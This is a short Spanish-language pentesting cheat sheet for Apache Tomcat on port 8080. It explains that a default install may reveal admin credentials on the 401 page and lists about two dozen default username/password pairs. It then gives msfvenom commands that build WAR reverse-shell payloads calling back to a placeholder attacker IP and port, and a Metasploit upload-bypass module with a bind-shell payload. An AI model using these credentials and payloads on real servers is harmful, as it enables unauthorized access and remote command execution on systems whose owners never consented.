8080 Apache Tomcat

Acceso por defecto al portal #

Con una instalación por defecto de tomcat, al intentar entrar al panel de administración, si no sabemos la contraseña, al pulsar en cancel, por defecto nos redirige a un fichero que dice: 401 Unauthorized y más abajo nos muestra el usuario y contraseña

Credenciales por defecto #

UsernamePassword
adminpassword
admin
adminPassword1
adminpassword1
adminadmin
admintomcat
bothtomcat
managermanager
role1role1
role1tomcat
rolechangethis
rootPassword1
rootchangethis
rootpassword
rootpassword1
rootr00t
rootroot
roottoor
tomcattomcat
tomcats3cret
tomcatpassword1
tomcatpassword
tomcat
tomcatadmin
tomcatchangethis

Reverse shell tomcat con msfvenom #

Método 1 #

msfvenom -p java/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war -o revshell.war

Método 2 #

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war -o revshell.war

JSP Payload (metasploit) #

use exploit/multi/http/tomcat_jsp_upload_bypass
set payload java/jsp_shell_bind_tcp